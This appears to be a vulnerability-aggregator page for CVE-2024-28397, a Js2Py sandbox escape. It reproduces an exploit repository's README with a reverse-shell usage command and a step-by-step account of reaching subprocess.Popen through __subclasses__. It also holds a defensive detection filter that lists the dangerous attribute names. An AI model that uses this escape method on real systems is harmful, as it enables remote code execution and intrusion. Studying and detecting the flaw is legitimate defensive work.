Related vulnerability
Title:
Js2Py security vulnerability
(CVE-2024-28397)
Description: Js2Py is a library from the Python Foundation used to translate JavaScript into Python code. Js2Py 0.74 and earlier contain a security vulnerability caused by a flaw in the js2py.disable_pyimport() component; an attacker can exploit it to execute arbitrary code through crafted API calls.
Description
This repository contains a Proof of Concept (PoC) for CVE-2024-28397, a vulnerability in the js2py library allowing a sandbox escape to achieve remote code execution.
Introduction
# CVE-2024-28397-Js2Py-RCE
📌 **Description**
This repository contains a Python-based Proof of Concept (PoC) for CVE-2024-28397, a sandbox escape vulnerability in the Js2Py JavaScript interpreter for Python.
When the target application evaluates untrusted JS code via Js2Py, an attacker can break out of the sandbox and execute arbitrary Python code. This can be leveraged to gain remote code execution (RCE) and a reverse shell on the vulnerable system.
This exploit was inspired by Marven11’s [CVE-2024-28397-js2py-Sandbox-Escape](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape) project.
---
⚠️ **Disclaimer**
This script is provided for educational and authorized penetration testing purposes only. Unauthorized use of this script against systems you do not own or have explicit permission to test is illegal and unethical. The author assumes no responsibility for misuse or damage caused by this script.
---
🧠 **About the Vulnerability**
- CVE ID: [CVE-2024-28397](https://nvd.nist.gov/vuln/detail/CVE-2024-28397)
- Component: Js2Py sandbox escape
- Impact: Unrestricted access to Python’s object model via `__class__.__base__.__subclasses__`, leading to arbitrary code execution
- Attack Vector: Remote (via exposed HTTP interface evaluating user-controlled JavaScript)
---
🚀 **Features**
- Automatic reverse shell payload delivery via Python RCE
- Inline Base64-encoded shell command execution
- Built-in reverse shell listener with basic PTY stabilization
- Clean output formatting
- Lightweight and dependency-free (except for requests)
---
🔧 **Requirements**
- Python 3.x
- `requests` module (`pip install requests`)
- A Linux system (for `/dev/tcp` reverse shell)
- A target running a vulnerable implementation of Js2Py
---
📦 **Usage**
```bash
python3 exploit.py --target http://example.htb --lhost 10.10.14.51 --lport 4444
```
- `--target`: The full URL to the vulnerable web app endpoint
- `--lhost`: Your local IP address (used for reverse shell)
- `--lport`: Your local port to receive the shell
---
🛠️ **How It Works**
1. The script prepares a Bash reverse shell, Base64-encodes it, and injects it into a JavaScript payload.
2. The JS payload walks the Python object tree using `__class__.__base__.__subclasses__()` to find `subprocess.Popen`.
3. It uses `Popen` to decode and execute the shell.
4. The attacker’s machine receives the reverse shell and automatically stabilizes it.
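A defender-side complement to the steps above, added here as an example and not part of this repository or of Js2Py: a small Python pre-filter that flags submitted JavaScript reaching for the Python object-model names the payload depends on (in dot or bracket syntax), plus a check of a js2py version string against the affected range the page states (0.74 and earlier). The dangerous-name list and the sample JS strings are constructed assumptions for this example.

```python
import re
from typing import List

# Attribute names the payload described above uses to climb from a JS-exposed object
# into Python's object model, plus the pyimport keyword that js2py.disable_pyimport()
# is meant to block. Constructed list for this example; extend it for your deployment.
DANGEROUS_NAMES = (
    "__class__", "__base__", "__bases__", "__mro__", "__subclasses__",
    "__globals__", "__builtins__", "__import__", "__getattribute__", "pyimport",
)

# Match each name as a whole identifier so it is caught after a dot (o.__class__),
# inside a string used for bracket access (o["__class__"]) or as a bare statement
# (pyimport os), but not as part of a longer identifier such as my__class__.
_NAME_RE = re.compile(
    r"(?<![\w$])(" + "|".join(re.escape(n) for n in DANGEROUS_NAMES) + r")(?![\w$])"
)


def find_object_model_access(js_source: str) -> List[str]:
    """Return the distinct flagged names in untrusted JS, in order of first appearance."""
    found: List[str] = []
    for match in _NAME_RE.finditer(js_source):
        name = match.group(1)
        if name not in found:
            found.append(name)
    return found


def is_affected_version(version: str) -> bool:
    """True when a js2py version string is 0.74 or earlier (the range the advisory names).
    Only major.minor are compared, so any 0.74.x is conservatively treated as affected."""
    nums = [int(p) for p in re.findall(r"\d+", version)]
    if not nums:
        raise ValueError(f"unparseable version string: {version!r}")
    major, minor = (nums + [0, 0])[:2]
    return (major, minor) <= (0, 74)


if __name__ == "__main__":
    # Constructed sample submissions: one escape attempt in dotted form, one in
    # bracket form, one harmless function.
    samples = [
        'let c = "".__class__.__base__.__subclasses__();',
        'var g = obj["__getattribute__"]("__globals__");',
        "function add(a, b) { return a + b; }",
    ]
    for js in samples:
        print(f"{find_object_model_access(js) or 'clean'}: {js}")
    print("js2py 0.74 affected:", is_affected_version("0.74"))
```

A filter like this only raises a detection signal and can be bypassed by string-building tricks; the mitigation is not to evaluate untrusted JavaScript with an affected Js2Py at all.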
File snapshot
[4.0K] /data/pocs/cde797a416267fc9b08fdd6e18ef3a1112a9c4be
├── [4.2K] exploit.py
└── [2.4K] README.md
0 directories, 2 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be reached, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.